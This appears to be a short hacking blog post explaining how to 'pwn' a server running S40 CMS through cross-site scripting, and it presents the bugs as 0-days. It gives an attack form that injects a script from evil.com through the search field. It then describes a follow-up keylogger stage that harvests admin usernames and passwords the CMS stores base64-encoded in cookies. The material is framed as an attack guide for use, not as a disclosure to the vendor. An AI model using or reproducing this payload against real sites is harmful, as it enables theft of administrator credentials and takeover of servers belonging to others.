In this post i will go over how to pwn a server by exploiting just XSS. This is some what special circumstance but we will go over that a little later. I will also be targeting S40 CMS for this post and giving out a few XSS 0-days in the process :)
So our goal is to get the admin user name and password, but using XSS is not always the best way to go about it "note i said get login details not stealing sessions". Now due to some major security issues in S40 i can show you two ways to get the admin creds. If our victim checks the remember me box at the admin login page, S40 saves the user name and password "base64 encoded" in your cookie. Which brings us to our first XSS. S40 has a handy search function that happens to be open to XSS and allows for our entery point. Lets look at our attack code:
xss_attack.html #Remember we have to get our victim to visit this page.
[form action="http://s40.biz" name="go" method="POST"]
[input type='hidden' name='gsearchfield' value='"][script src=http://evil.com/xss.js][/script]']
We do this because later when the victim goes to login, S40 will look in the cookie for user name and password data. Then if it finds data it push it into the appropriate input fields on the login page. So if we injected a key logger as our payload for the second phase, and the admin goes to login your payload gets run and you get the login details! There you have it, going from XSS to pwn. It just takes a perfect storm of XSS which is sadly all to common.